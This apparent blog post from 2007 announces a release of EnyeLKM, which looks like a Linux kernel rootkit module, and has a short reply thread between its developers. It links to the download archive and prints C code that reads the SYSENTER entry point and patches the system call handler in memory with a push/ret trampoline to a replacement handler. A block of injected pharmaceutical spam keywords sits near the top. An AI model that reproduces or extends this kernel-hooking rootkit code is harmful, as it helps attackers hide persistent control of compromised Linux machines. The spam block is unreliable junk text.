« Basic platform.
EnyeLKM 1.1.4 »

EnyeLKM 1.1.3

Language / Lenguaje:
Testerone Hgh Medical Atrovent Anxiety Byetta Lisinopril Interaction Migraine And Depakote Flatulence Glucophage La Piazza Allegra Hamilton Ontario Is There Ibuprofen In Cafergot Hoodia Gardonia Effect Blood Pressure Headaches And Prozac Next Day Cialis Prozac Causes Parkinsons Disease Imitrex And Alcohol Lipitor Versus Levostatin Fda Approval For Risperdal 1993 Tramadol Acet D Cup Breast Augmentation Faxine Effexor Dysfunction Erectile Levitra Femara As Fertility Drug Bacteria Producing Chitosan Using Crabshell Ultram End Of Dose Prednisone And Hyperglycemia Erectile Dysfunction And Lipitor Viagra Coverage Ca Dilantin Levels In Blood Interactions Symptoms Of Celexa And Biaxin Colchicine Overdose Effects Elavil Used In Suicide Fosamax Joint And Muscle Pain Zoloft Sertraline Tablets Getting Off Effexor Xr Cialis Buy It Online Huge Discount Clomid Affects Hcg Levels Aciphex Directions Reasons Why Viagra Would Be Ineffective Medical Research For Levitra Relafen Neuropathy Norvasc And Peripheral Edema Levoquin And Coumadin What To Eat When Taking Coumadin Prolong Use Of Lexapro Hoodia And Medicine Interactions Ultram Tramadol Hci Tablet Zocor Cost Per Pill Effects Of Levitra On Women Viagra Sale Cheap Colchicine Gout Colchicine Treatment Gout Actos Takeda Pharm Lasix Symtoms Lioresal Prescribing Information

http://www.fr33project.org/projects/enyelkm-1.1.3.rar

EnyeLKM 1.1.2 obtains the SYSENTER at execution time with the instruction: rdmsr( MSR_IA32_SYSENTER_EIP, psysenter_entry, v2 ); it does not give a single warning when doing a make!!!

Also all base.c has been reprogrammed and two new modules have been created:
extern_symbols: were functions exist to obtain external symbols to LKM, for example:
/* thx to Int27h :-). */
void * get_sysenter_entry( void )
{
void * psysenter_entry = NULL ;
unsigned long v2 ;
if ( boot_cpu_has( X86_FEATURE_SEP ) )
rdmsr( MSR_IA32_SYSENTER_EIP, psysenter_entry, v2 );
else
return NULL;
return psysenter_entry;
}

Also the module lowlevel_layer has been created: thanks to this module we can abstract ourselves quite a lot with the modules that search in opcodes memory and rest of the functions, for example:
void set_idt_handler( void * system_call )
{
unsigned char * p;
push_ret_t push_ret;
p = (unsigned char *) system_call;
/* first jump */
while ( !is_jnb_opcode( (unsigned char *) p ) )
p ++;
p -= DISTANCE_FROM_CMP_NR_SYSCALL_TO_JNB;
create_push_ret( & push_ret, (unsigned long) new_idt );
write_push_ret( ( void *) p, & push_ret )

And before this looked like:
void set_idt_handler(void *system_call)
{
unsigned char *p;
unsigned long *p2;
p = (unsigned char *) system_call;
/* first jump */
while (!((*p == 0×0f) && (*(p+1) == 0×83)))
p++;
p -= 5;
*p++ = 0×68;
p2 = (unsigned long *) p;
*p2++ = (unsigned long) new_idt;
p = (unsigned char *) p2;
*p = 0xc3;

As we can apreciate now is much more easier to abstract ourselves of the problem thanks to the “lowlevel” layer.
The next thing I will develop its the possible unload of the module, another module for the memory management with WRITTING-AND-RESTORE for its load will have to be created at least

¿What do you think RaiSe? ¿Do you like it?

Posted by David Reguera Garcia

This entry was posted on Thursday, March 22nd, 2007 at 8.41 am and is filed under release. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

2 Responses to “EnyeLKM 1.1.3”

  1. RaiSe Says:
    2007-03-22 at 10.42 pm

    Language / Lenguaje: Spanish / Español

    I like it, I like it :). Maybe quite excesive so much formalism, but well much better this way, haha. The sysenter is much better like that, still have not been able to check it, tomorrow I will check it on vmware see how it goes :). The load/unload, that is important, because when developing it is a pain in the arse to be reseting haha. About creating another ‘module’ it rather confused me a bit, is not another module, is another file, no?, it is because when I read it I thought you were loading another lkm. Greetings.

  2. David Reguera Garcia Says:
    2007-03-23 at 8.34 am

    Language / Lenguaje: Spanish / Español

    Yes it is another file, well module of the project, not the kernel :-).

Leave a Reply

You must be logged in to post a comment.